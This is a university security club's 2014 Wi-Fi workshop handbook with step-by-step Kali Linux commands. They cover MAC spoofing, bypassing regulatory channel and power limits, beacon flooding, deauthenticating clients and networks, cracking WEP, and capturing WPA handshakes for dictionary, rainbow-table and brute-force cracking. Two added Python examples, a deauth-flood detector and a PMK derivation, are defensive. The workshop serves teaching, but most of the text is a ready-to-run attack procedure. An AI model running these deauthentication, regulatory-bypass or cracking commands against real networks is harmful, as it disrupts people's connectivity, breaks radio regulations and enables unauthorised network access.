Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook


The information provided in this manual is to be used for educational purposes only. The authors are in no way responsible for any misuse of the information provided. All of the information in this manual is meant to help the reader develop a Wi-Fi hacker defense attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. Any hacking discussed in this manual should be regarded as ethical hacking. You implement the information given at your own risk. By reading the tutorials given in this manual, you agree that they are intended for educational purposes only and that the author cannot be held liable for any kind of damage done whatsoever to your machine, or for damage caused by some other, creative application of these tutorials. If you disagree with the above statement, stop here.

*Note - All images, programs, and steps in this manual were tested and performed with the 32-bit Kali Linux version 1.0.6 live ISO downloaded from http://www.kali.org, installed to a USB flash drive with YUMI Multiboot USB Creator (available from http://www.pendrivelinux.com), and an Alfa AWUS036H USB wireless adapter on a laptop computer with an internal wireless card and an internal Ethernet card. Any statement starting with a # character is meant to be run in the terminal. Each section of this manual starts as if you had just freshly booted into Kali. You may not need to do the first steps in a section if you have already done work since booting your computer; two examples of this are opening the terminal and starting monitor mode on wlan1 so that you already have a mon0 interface. When text appears in quotes, that means not to type it verbatim, but rather to substitute something for the text in the quotes. For example, "password" means to type what you want the password to be.


Table of Contents
Terms and Definitions ... 7
Getting to know Kali Linux ... 9
Initial Computer Setup ... 10
Tools Used in this manual ... 11
Finding the correct Wireless adapter ... 13
Finding your MAC address ... 14
Specifically changing your MAC address ... 15
Randomly changing your MAC address ... 17
Changing your MAC address back to the factory address ... 19
Changing the channel of your wireless card ... 20
Operating Wi-Fi outside US regulation frequencies ... 21
Operating your wireless card with more power ... 23
Finding the modes your wireless card supports ... 25
Operating your card in ad-hoc mode ... 26
Operating your card in monitor mode ... 28
Data gathering in monitor mode ... 29
Beacon Flooding ... 31
Viewing Probe Requests ... 33
Passive Network Scan ... 35
Active Network Scan ... 37
Directed Client Deauthentication ... 38
Directed Network Deauthentication ... 40
Multiple Network Deauthentication ... 42
Forced connection to a specific access point ... 44
Breaking WEP Encryption ... 46
Breaking WPA Encryption with a dictionary list ... 50
Breaking WPA Encryption with a rainbow table ... 54
Computing personalized Rainbow Tables ... 58
Breaking WPA Encryption by brute force ... 60
Charts and Figures ... 64

Terms and Definitions

Access Point (AP) - A device that allows wireless devices to connect to a wired network using Wi-Fi.

Bandwidth - The difference between the upper and lower frequencies in a continuous set of frequencies.

Channel - A pre-defined number assigned to a specific center frequency and bandwidth within the frequency range that Wi-Fi operates in. Within the US, channels 1-11 are available for use at higher powers.

Evil Twin - A rogue Wi-Fi access point that appears to be a legitimate one offered on the premises, but has actually been set up to eavesdrop on wireless communications.

Frequency - A rate of oscillation, which for radio corresponds to the radio waves and the alternating currents that carry radio signals.

Honeypot - A wireless access point intentionally set up to allow people to connect to it, for the purpose of monitoring traffic or for other malicious reasons.

IEEE 802.11 - A set of media access control and physical layer specifications for implementing wireless local area network computer communication in the 2.4 GHz, 3.6 GHz, 5 GHz, 60 GHz and TV white space frequency bands.

IP Address - A numerical label assigned to each device participating in a computer network that uses the Internet Protocol for communication.

ISM Band - Radio bands reserved internationally for the use of radio frequency energy for industrial, scientific and medical purposes other than telecommunications. Despite the intent of the original allocations, and because there are multiple allocations, in recent years the fastest-growing uses of these bands have been for short-range, low-power communications systems.

MAC Address - A unique identifier assigned to network interfaces for communications on the physical network segment.

Modes - Different ways that the wireless card can function. These modes include master, managed, ad-hoc, mesh, repeater, and monitor. Master mode is used by wireless access points. Managed mode is used by clients to connect to a wireless network. Ad-hoc is used for creating a network directly between clients. Mesh mode is used in commercial applications to create ad-hoc networks between access points. Repeater mode is used to boost the range of a wireless access point. Monitor mode is used when wishing to view traffic that was not meant for your computer.

NIC - Short for network interface card. A computer hardware component that connects a computer to a computer network.

Packet - A formatted unit of data carried by a packet-switched network. A packet consists of two kinds of data: control information and user data (also known as payload). The control information provides data the network needs to deliver the user data, for example source and destination network addresses, error detection codes, and sequencing information. Typically, control information is found in packet headers and trailers, with payload data in between.

Rainbow Table - A pre-computed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a plaintext password up to a certain length consisting of a limited set of characters.

WEP - Wired Equivalent Privacy. An easily broken security algorithm for IEEE 802.11 wireless networks, introduced in 1999.

Wi-Fi - The trademarked name from the Wi-Fi Alliance for a popular technology that allows the wireless transfer of data based upon the IEEE 802.11 standard.

WPA - Wi-Fi Protected Access. A security protocol and security certification program developed by the Wi-Fi Alliance to secure wireless networks. WPA was designed to take the place of WEP.

WPA2 - Wi-Fi Protected Access II. A security protocol and security certification program developed by the Wi-Fi Alliance to secure wireless networks. WPA2 was designed to take the place of WPA.

Getting to know Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni and Devon Kearns of Offensive Security developed it by rewriting BackTrack, their previous forensics Linux distribution. In addition to Kali Linux, Offensive Security also maintains the Exploit Database and the free online course Metasploit Unleashed. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), and Aircrack-ng (a software suite for penetration-testing wireless LANs). Users may run Kali Linux from a hard disk, live CD, or live USB. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits. Kali Linux is distributed in 32- and 64-bit images for use on hosts based on the x86 instruction set, as well as an image for the ARM architecture for use on the Raspberry Pi computer and on Samsung's ARM Chromebook.

Initial Computer Setup
1. With the computer off, plug in the USB flash drive with Kali Linux installed as well as the USB Alfa wireless card.
2. Turn on the computer and boot off of the USB. This will vary by computer manufacturer, but there will be a button to press before your computer boots off of the internal hard drive.
3. You should be brought to the YUMI multiboot USB start page. Using the arrow keys, select System Tools -> and hit enter.
4. You should be brought to the System Tools page of YUMI. Using the arrow keys, select kali-linux-1.0.6-i386 and hit enter.
5. You should be brought to the Kali Linux boot menu. Using the arrow keys, select Live (686-pae) and hit enter. Your computer is now booting off of the USB drive in live mode. This means that nothing is being written to the hard drive; in fact you could do this without a hard drive installed at all.
6. You should now be booted into Kali Linux and sitting at the desktop. Note that by default Kali runs in a single-user environment, meaning that you are root (the administrator). If Kali is left alone for a set amount of time it will lock the screen; the password for the root account is toor.
7. In order to enable the wireless cards, you must turn off airplane mode, which is enabled by default. Click Applications -> System Tools -> Preferences -> System Settings. From System Settings select Network and then click the Airplane Mode toggle switch to make sure it is off.
8. Your computer is now ready to proceed through this manual.

Tools used in this manual

aircrack-ng
 - http://www.aircrack-ng.org
 - A network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks.

aireplay-ng
 - http://www.aircrack-ng.org/doku.php?id=aireplay-ng
 - Used to inject frames and generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.

airmon-ng
 - http://www.aircrack-ng.org/doku.php?id=airmon-ng
 - This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode.

airodump-ng
 - http://www.aircrack-ng.org/doku.php?id=airodump-ng
 - Used for capturing raw 802.11 frames; it is particularly suitable for collecting WEP IVs (initialization vectors) with the intent of using them with aircrack-ng.

Jasager-karma
 - http://www.digininja.org/jasager/
 - KARMA-enabled access points passively listen for client probe requests and respond with the SSID the client probed for, thus impersonating virtually any access point.

Kali Linux
 - http://www.kali.org/
 - A Debian-derived Linux distribution designed for digital forensics and penetration testing.

mdk3
 - http://homepages.tu-darmstadt.de/~p_larbig/wlan/
 - A program that uses the osdep injection library from the aircrack-ng project. Used for packet injection as well as numerous other Wi-Fi related attacks, such as a wireless DDOS (directed denial of service) attack.

tshark
 - http://www.wireshark.org/
 - An open-source packet analyzer used for network troubleshooting, analysis, software and communication protocol development, and education.

Finding the correct wireless adapter
1. Open the terminal
2. Type #airmon-ng and hit enter
3. The interface with the Realtek RTL8187L is the one you want to use. In this case that interface is wlan1, because there is already an internal wireless card, which is wlan0. Your situation may be different; substitute the correct interface on your own computer wherever wlan1 is used in this manual.

Finding your MAC address
1. Open the terminal
2. Type #ifconfig wlan1

Specifically changing your MAC address
1. Open the terminal
2. Type #ifconfig wlan1 down
3. Type one of the following:
   #ifconfig wlan1 hw ether de:ad:be:ef:c0:fe
   #macchanger -m de:ad:be:ef:c0:fe wlan1
4. Type #ifconfig wlan1 up
5. Type #ifconfig wlan1
****Notice that the MAC address is now different from what this command shows when the computer is first booted.

Randomly changing your MAC address
1. Open the terminal
2. Type #ifconfig wlan1 down
3. Type one of the following:
   #ifconfig wlan1 hw ether 96:de:3a:c5:3a:74 (a specific address you picked at random)
   #macchanger -r wlan1 (a random address chosen by the computer)
4. Type #ifconfig wlan1 up
5. Type #ifconfig wlan1
****Notice that the MAC address is now different from what this command shows when the computer is first booted.

Changing your MAC address back to factory original
1. Open the terminal
2. Type #ifconfig wlan1 down
3. Type #macchanger -p wlan1
4. Type #ifconfig wlan1 up
5. Type #ifconfig wlan1

Changing the channel of your wireless card
1. Open the terminal
2. Type #iwconfig wlan1
3. Type #iwconfig wlan1 channel "c", where "c" is the channel you wish to set
4. Type #iwconfig wlan1
****Notice that a Frequency field has been added; it changes depending upon which channel you entered.

Operating Wi-Fi outside US regulation frequencies
1. Open the terminal
2. Type #iw reg get
3. Type #iw reg set JP
4. Type #iw reg get
5. Type #iwconfig wlan1 channel "c", where "c" is the channel you wish to use (1-14)
6. Type #iwconfig wlan1
****Notice that the frequency corresponds to channel 14, which is normally not available for use in the United States and is only used in Japan. The same holds for channels 12 and 13, which are not used at higher power in the US.

Operating your wireless card with more power
1. Open the terminal
2. Type #iwconfig wlan1
3. Type #iw reg set BO
4. Type #iwconfig wlan1 txpower 30
5. Type #iwconfig wlan1
****Notice that the Tx-Power has changed from 20 dBm to 30 dBm. This is a change from 0.1 W to 1 W. The FCC regulation on ERP (Effective Radiated Power) depends on the use of the wireless link: a point-to-point wireless link may have a greater ERP than a point-to-multipoint wireless link.

Finding the modes your wireless card supports
1. Open the terminal
2. Type #airmon-ng
3. Type #iw phy phy0 info | grep -A3 modes
Notice that phy0 is the Realtek RTL8187L; this may vary on your computer.

Operating your wireless card in ad-hoc mode
Step 6 is optional, as it enables WEP security.
1. Open the terminal
2. Type #ifconfig wlan1 down
3. Type #iwconfig wlan1 mode ad-hoc
4. Type #iwconfig wlan1 channel 1
5. Type #iwconfig wlan1 essid "nameofnetwork"
6. Type #iwconfig wlan1 key s:"password" Note that the key must work out to 10 or 26 hexadecimal digits, which is equivalent to 5 or 13 ASCII characters.
7. Type #ifconfig wlan1 up
8. Type #iwconfig wlan1

Operating your card in monitor mode
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #iwconfig
****Notice that a new interface has been created, mon0.

Data gathering in monitor mode
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #tshark -i mon0
You should see something similar to this: every packet being sent across the given channel.
4. Type ctrl-c to end
5. Type #airodump-ng mon0
You should see something similar to this: the top section shows access points, while the bottom shows client computers.
6. Type ctrl-c to end

Beacon Flooding
Beacons are a type of 802.11 (Wi-Fi) management frame. They are transmitted periodically by an access point to announce its presence and contain all of the information about a network (name, speeds, encryption type, etc.). These frames can be sent even though the network does not exist.
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #nano ssidlist
4. Add the different network names, one per line
5. Hit ctrl-x, then y, then enter when done entering network names
6. Type #mdk3 mon0 b -f ssidlist
7. Hit ctrl-c to quit when done sending beacons
****You can view these networks on a computer, but you cannot connect to them since they are not real.

Viewing Probe Requests
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #airodump-ng mon0
4. Type ctrl-c to stop
****Notice that this section of output is at the very bottom of the screen. If many access points are within range, you might have to zoom out while the program is running and then zoom back in after stopping it. The text zoom option is available from the View menu at the top of the screen.

Passive Network Scan
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #iw dev wlan1 scan passive | grep SSID

Active Network Scan
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #iwlist wlan1 scan | grep ESSID

Directed Client Deauthentication
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #airodump-ng mon0. This is where a target is chosen: the BSSID is the AP MAC and the STATION is the client MAC; the ESSID is the network name and the number under CH is the channel.
4. Type ctrl-c to quit
5. Type #iwconfig mon0 channel 11 (11 is the channel of the AP from above)
6. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "Client MAC" mon0

Directed Network Deauthentication
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #airodump-ng mon0 and choose your target network
4. Type ctrl-c when finished
5. Type #nano blacklist and put the target network's MAC address in the file, one address per line
6. Type ctrl-x, Y, enter
7. Type #mdk3 mon0 d -b blacklist -c 11 (11 is the channel of the access point)
8. Type ctrl-c to stop

Multiple Network Deauthentication
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #airodump-ng mon0 and choose your target networks
4. Type ctrl-c when finished
5. Type #nano blacklist and put the target networks' MAC addresses in the file, one address per line
6. Type ctrl-x, Y, enter
7. Type #mdk3 mon0 d -b blacklist -c 6,11 (6 and 11 are the channels of the access points)
8. Type ctrl-c to stop
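The three deauthentication procedures above leave a recognisable trace on the air: one source address emitting many deauthentication (or disassociation) frames in a short time. The following detector is an added example, not part of the handbook or of the aircrack-ng/mdk3 projects; it parses the fixed 802.11 header of constructed management frames and raises an alert when a sender crosses a rate threshold, which is the check a wireless IDS performs. The threshold, window, reason codes and MAC addresses are assumptions for the demo.

```python
"""Deauthentication-flood detector over raw 802.11 frames (added example)."""
from collections import defaultdict, deque

MGMT = 0            # frame type 0 = management
DEAUTH = 12         # management subtype 12 = deauthentication
DISASSOC = 10       # management subtype 10 = disassociation
HEADER_LEN = 24     # FC(2) + duration(2) + addr1/addr2/addr3(18) + seq ctl(2)


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(octet, 16) for octet in text.split(":"))


def parse_header(frame: bytes):
    """Return (type, subtype, addr1, addr2, addr3, reason) or None if too short.
    Frame-control byte 0: bits 0-1 version, bits 2-3 type, bits 4-7 subtype.
    For management frames addr1 = destination, addr2 = source, addr3 = BSSID.
    Deauth/disassoc bodies begin with a 2-byte little-endian reason code."""
    if len(frame) < HEADER_LEN:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    reason = None
    if ftype == MGMT and subtype in (DEAUTH, DISASSOC) and len(frame) >= HEADER_LEN + 2:
        reason = int.from_bytes(frame[HEADER_LEN:HEADER_LEN + 2], "little")
    return (ftype, subtype, mac_str(frame[4:10]), mac_str(frame[10:16]),
            mac_str(frame[16:22]), reason)


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, reason: int = 0) -> bytes:
    """Constructed frame for the demo, laid out as a monitor-mode capture would show it."""
    fc = bytes([(MGMT << 2) | (subtype << 4), 0x00])
    return (fc + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
            + b"\x00\x00" + reason.to_bytes(2, "little"))


class DeauthFloodDetector:
    """Alert when one source address sends `threshold` deauth/disassoc frames
    inside a sliding window of `window` seconds. Forged deauths carry the AP's
    own address as source, so the AP address is what shows up as the sender;
    a legitimate AP has no reason to emit many such frames per second."""

    def __init__(self, threshold: int = 5, window: float = 1.0):
        self.threshold, self.window = threshold, window
        self.seen = defaultdict(deque)   # source MAC -> timestamps inside the window

    def observe(self, ts: float, frame: bytes):
        hdr = parse_header(frame)
        if hdr is None:
            return None
        ftype, subtype, dst, src, bssid, reason = hdr
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            return None
        recent = self.seen[src]
        recent.append(ts)
        while recent and ts - recent[0] > self.window:
            recent.popleft()
        if len(recent) == self.threshold:      # fire once, when the line is crossed
            return {"sender": src, "bssid": bssid, "target": dst,
                    "count": len(recent), "reason": reason, "at": ts}
        return None


def run_sample():
    """Constructed capture: a legitimate AP (02:00:00:00:00:aa) sends two isolated
    deauths (reason 3, station leaving), then ten forged deauths spoofing that AP
    hit one client within a second (reason 7 chosen for the demo).
    Returns the list of alerts raised."""
    ap, client, bcast = "02:00:00:00:00:aa", "02:00:00:00:00:c1", "ff:ff:ff:ff:ff:ff"
    capture = [(0.0, build_mgmt_frame(DEAUTH, bcast, ap, ap, reason=3)),
               (5.0, build_mgmt_frame(DEAUTH, client, ap, ap, reason=3))]
    capture += [(round(10.0 + 0.1 * i, 1), build_mgmt_frame(DEAUTH, client, ap, ap, reason=7))
                for i in range(10)]
    det = DeauthFloodDetector(threshold=5, window=1.0)
    return [alert for ts, frame in capture if (alert := det.observe(ts, frame))]
```

The same logic applied to a real monitor-mode capture would need the radiotap header stripped first; the detector only looks at the 802.11 header that follows it.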

Forced connection to a specific access point
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #airodump-ng mon0 and note the AP that will remain accessible
4. Type ctrl-c when finished finding the AP info
5. Type #nano whitelist and put that AP's MAC address in the file
6. Type ctrl-x, Y, enter when finished
7. Type #mdk3 mon0 d -w whitelist
8. Type ctrl-c to stop

Breaking WEP Encryption
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #airodump-ng mon0
4. Type ctrl-c when a network has been found
5. Type #airodump-ng -c 6 -w acm_wep --bssid 12:18:0A:21:AE:E4 mon0
6. Open a new tab in the terminal (File > New Tab)
7. Type #aireplay-ng --ignore-negative-one -1 0 -a 12:18:0A:21:AE:E4 -h 00:C0:CA:75:6F:AB mon0
8. Type #aireplay-ng --ignore-negative-one -3 -b 12:18:0A:21:AE:E4 -h 00:C0:CA:75:6F:AB mon0
9. Go back to the first tab and wait until the number in the #Data column reaches 40000. Note that this is not a set number, because of the statistical analysis that goes into breaking the key; it can vary greatly depending upon the length of the key and several other factors. In this case it worked with ~55000.
10. Open a new tab in the terminal (File > New Tab)
11. Type #aircrack-ng -b 12:18:0A:21:AE:E4 acm_wep-01.cap
12. If not successful, try again after the #Data column reaches the suggested number
13. When successful you will see a message similar to the one below
14. Go to each of the other tabs and type ctrl-c to stop the running program.

Breaking WPA Encryption with a dictionary list
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Kill the two processes that could cause trouble with the command #kill "pid", where "pid" is the PID from the airmon-ng output above
4. Type #airodump-ng mon0
5. Type ctrl-c when finished finding the target
6. Type #airodump-ng -c 11 --bssid 00:1A:C4:51:3C:31 -w acm_dictionary mon0
7. Open a new tab in the terminal (File > New Tab)
8. Type #iwconfig mon0 channel 11
9. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "client MAC" mon0
10. Go back to the first tab and wait until "WPA handshake:" appears in the upper right. Then type ctrl-c to stop the collection of data. This handshake is necessary to perform the password crack.
11. Make sure your dictionary file is in the same directory as your .cap file
12. Type #aircrack-ng acm_dictionary-01.cap -w english.txt

Breaking WPA Encryption with a Rainbow Table
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Kill the two processes that could cause trouble with the command #kill "pid", where "pid" is the PID from the airmon-ng output above
4. Type #airodump-ng mon0
5. Type ctrl-c when finished finding the target
6. Type #airodump-ng -c 11 --bssid 00:1A:C4:51:3C:31 -w acm_dictionary mon0
7. Open a new tab in the terminal (File > New Tab)
8. Type #iwconfig mon0 channel 11
9. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "client MAC" mon0
10. Go back to the first tab and wait until "WPA handshake:" appears in the upper right. Then type ctrl-c to stop the collection of data. This handshake is necessary to perform the password crack.
11. Make sure your rainbow table file is in the same directory as your .cap file
12. Type #cowpatty -r acm_dictionary-01.cap -d acm_dictionary_hash -s acm_dictionary

Computing personalized Rainbow Tables
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Type #airodump-ng mon0
4. Type ctrl-c when finished finding the target
5. Make sure your dictionary file is in your current directory
6. Type #genpmk -f English.txt -d acm_dictionary_hash -s acm_dictionary
7. When the program finishes running, the rainbow table will be saved in the current directory
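The reason genpmk and cowpatty both take -s is that the network name is part of the key derivation. The following is an added example, not part of the handbook or of the coWPAtty project: it implements the IEEE 802.11i passphrase-to-PMK mapping, checks it against the standard's published known answer, and shows that a table precomputed for one SSID yields nothing against a network with a different name. The wordlist and the two network names are constructed for the demo.

```python
"""PSK -> PMK derivation behind genpmk/coWPAtty tables (added example)."""
import hashlib

ITERATIONS = 4096   # fixed by IEEE 802.11i
PMK_LEN = 32        # bytes


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32) per IEEE 802.11i.
    The SSID is the salt: the same passphrase gives an unrelated PMK on every
    differently named network, which is why a precomputed table is per-SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), ITERATIONS, PMK_LEN)


def ieee_known_answer_ok() -> bool:
    """Known-answer test from the IEEE 802.11i passphrase-to-PSK mapping annex."""
    expected = ("f42c6fc52df0ebef9ebb4b90b38a5f90"
                "2e83fe1b135a70e23aed762e9710a12e")
    return derive_pmk("password", "IEEE").hex() == expected


def build_table(passphrases, ssid: str) -> dict:
    """The precomputation genpmk performs: PMK -> passphrase for one SSID.
    Every entry still costs the full 4096 HMAC rounds; the table only moves
    that work ahead of time, and only for the one network name."""
    return {derive_pmk(p, ssid): p for p in passphrases}


def lookup_demo() -> dict:
    """Constructed check of the SSID binding. A table built for the assumed
    default name "linksys" matches a network still using that name but misses
    one renamed to "sig-sec-lab-2014", although the passphrase is identical."""
    words = ["password", "letmein1", "correcthorse"]   # constructed wordlist
    table = build_table(words, "linksys")
    pmk_default_name = derive_pmk("password", "linksys")
    pmk_renamed = derive_pmk("password", "sig-sec-lab-2014")
    return {"default_ssid_hit": table.get(pmk_default_name),
            "renamed_ssid_hit": table.get(pmk_renamed)}
```

For a defender the two levers are visible here: a network name that appears in no public table set forces the full PBKDF2 cost for every guess, and a long passphrase multiplies the number of guesses needed.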

Breaking WPA Encryption by brute force
1. Open the terminal
2. Type #airmon-ng start wlan1
3. Kill the two processes that could cause trouble with the command #kill "pid", where "pid" is the PID from the airmon-ng output above
4. Type #airodump-ng mon0
5. Type ctrl-c when finished finding the target
6. Type #airodump-ng -c 11 --bssid 00:1A:C4:51:3C:31 -w acm_dictionary mon0
7. Open a new tab in the terminal (File > New Tab)
8. Type #iwconfig mon0 channel 11
9. Type #aireplay-ng --ignore-negative-one -0 10 -a "AP MAC" -c "client MAC" mon0
10. Go back to the first tab and wait until "WPA handshake:" appears in the upper right. Then type ctrl-c to stop the collection of data. This handshake is necessary to perform the password crack.
11. Type #john -stdout -incremental:all | aircrack-ng -b 00:1a:c4:51:3c:31 -w - acm_dictionary-01.cap (the -w - makes aircrack-ng read candidate passwords from the pipe rather than from a file)
12. Now you wait until the program has cracked the password. The given method will eventually break every password, but it would take an extremely long time. There are optimizations that could be made, for example if the length of the key was known. In making this manual, I did not wait until completion because of time constraints.

Charts and Figures
Figure: Wi-Fi channels in the 2.4 GHz band and 5 GHz band
Figure: 802.11 standards